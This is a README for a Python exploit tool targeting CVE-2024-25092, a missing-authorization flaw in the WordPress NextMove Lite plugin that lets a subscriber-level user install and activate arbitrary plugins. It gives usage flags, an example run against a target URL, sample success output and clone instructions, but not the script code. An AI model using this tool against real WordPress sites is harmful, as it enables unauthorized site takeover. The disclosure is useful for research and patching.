# CVE-2024-25092 Exploit 

## Overview

**CVE-2024-25092** is a high-severity vulnerability affecting the WordPress NextMove Lite plugin (versions <= 2.17.0). This vulnerability allows a subscriber+ user to install and activate arbitrary plugins on a WordPress site due to missing authorization checks.

### Details

- **Published**: 2024-06-09
- **Updated**: 2024-06-09
- **Severity**: High (CVSS Score: 8.8)
- **CWE**: CWE-862 - Missing Authorization
- **Affected Versions**: All versions from n/a through 2.17.0

### CVSS Vector

- **CVSS Version**: 3.1
- **Vector String**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

## Description

The XLPlugins NextMove Lite plugin for WordPress has a missing authorization vulnerability, allowing authenticated users with subscriber-level permissions or higher to perform arbitrary plugin installations and activations. This can lead to a complete compromise of the WordPress site.

## Exploit Script

The provided Python script automates the exploitation of this vulnerability by logging into the WordPress site and installing a specified plugin.

### Usage

```sh
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -un USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin to install (default: cart-for-woocommerce)
```

### Example

```sh
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
```

### Output

```sh
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
```

## Script Details

### Requirements

- Python 3.x
- `requests` library

### Installation

1. Clone the repository:
    ```sh
    git clone https://github.com/Nxploited/CVE-2024-25092.git
    cd CVE-2024-25092
    ```

2. Install the required Python packages:
    ```sh
    pip install requests
    ```

## Disclaimer

This script is intended for educational purposes only. Use it responsibly and only on systems for which you have explicit permission. Unauthorized use of this script is illegal and unethical.
